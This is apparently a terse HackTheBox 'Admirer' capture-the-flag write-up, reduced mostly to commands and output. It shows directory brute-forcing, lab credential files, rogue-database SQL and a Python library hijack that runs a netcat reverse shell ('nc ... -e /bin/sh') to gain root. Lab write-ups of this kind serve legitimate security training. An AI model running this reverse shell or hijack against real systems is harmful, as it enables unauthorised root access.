HackTheBox — Admirer

Summary

Enumeration

Nmap

User-agent: *# This folder contains personal contacts and creds, so no one -not even robots- should see it — waldo
Disallow: /admin-dir
root@strike:~# gobuster dir -u http://10.10.10.187/admin-dir/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.187/admin-dir/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/06/05 23:18:48 Starting gobuster
===============================================================
/contact.txt (Status: 200)
/credentials.txt (Status: 200)
===============================================================
2020/06/05 23:22:42 Finished
===============================================================
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!
<?php
$servername = "localhost";
$username = "waldo";
$password = "Wh3r3_1s_w4ld0?";

// Create connection
$conn = new mysqli($servername, $username, $password);

// Check connection
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
echo "Connected successfully";


// TODO: Finish implementing this or find a better open source alternative
?>

Exploitation

create database exploit;
use exploit;
create table dmp(content varchar(5000));

Privilege Escalation

import os 
def make_archive(a, b, c):
os.system('nc 10.10.x.xx 1337 -e "/bin/sh"')
root@strike:~# nc -lnvp 1337
listening on [any] 1337 ...
root@strike:~# nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.10.x.xx] from (UNKNOWN) [10.10.10.187] 52226
id
uid=0(root) gid=0(root) groups=0(root)

THX for ur time!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store